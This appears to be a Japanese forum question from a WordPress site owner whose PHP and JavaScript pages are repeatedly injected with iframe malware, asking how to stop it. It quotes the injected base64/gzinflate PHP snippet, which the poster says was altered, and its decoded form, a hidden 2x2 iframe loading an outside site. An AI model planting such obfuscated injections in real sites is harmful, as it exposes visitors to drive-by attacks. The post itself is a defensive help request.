ここ数日、私の Web サイトは繰り返し iframe 攻撃の標的になっています。コードは、主に PHP および Javascript ページに追加されます。次に、コードは PHP base 64 でエンコードされます。例を参照してください (中和するためにコードを少し変更しました)。
#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#
このデコードされたものは次のようになります。
<script type="text/javascript">
document.write(
'<iframe src="http://opticmoxie.com/xxxxxxx.php"
name="Twitter" scrolling="auto" frameborder="no"
align="center" height="2" width="2"></iframe>'
);
共通点の 1 つは、すべてのコードに「#c3284d#」というコメントが含まれているため、悪意のあるコードを追跡することは難しくありません。でも手間がかかる…
私たちは Gradwell (英国) の共有サーバーにいますが、特に役に立ちませんでした。問題は、この問題が繰り返されないようにするにはどうすればよいかということです。私は MySQL インジェクション攻撃を認識しており、PHP の mysql_real_escape_string を使用してそのような攻撃を防御しています。
サイトは PHP と MySQL ドライブです。MySQLFTP を使用し、SSH アクセス用のシェル アカウントを持っています。私たちはWordpressを使用しています(プラグインを無効にした最新のアップデート)。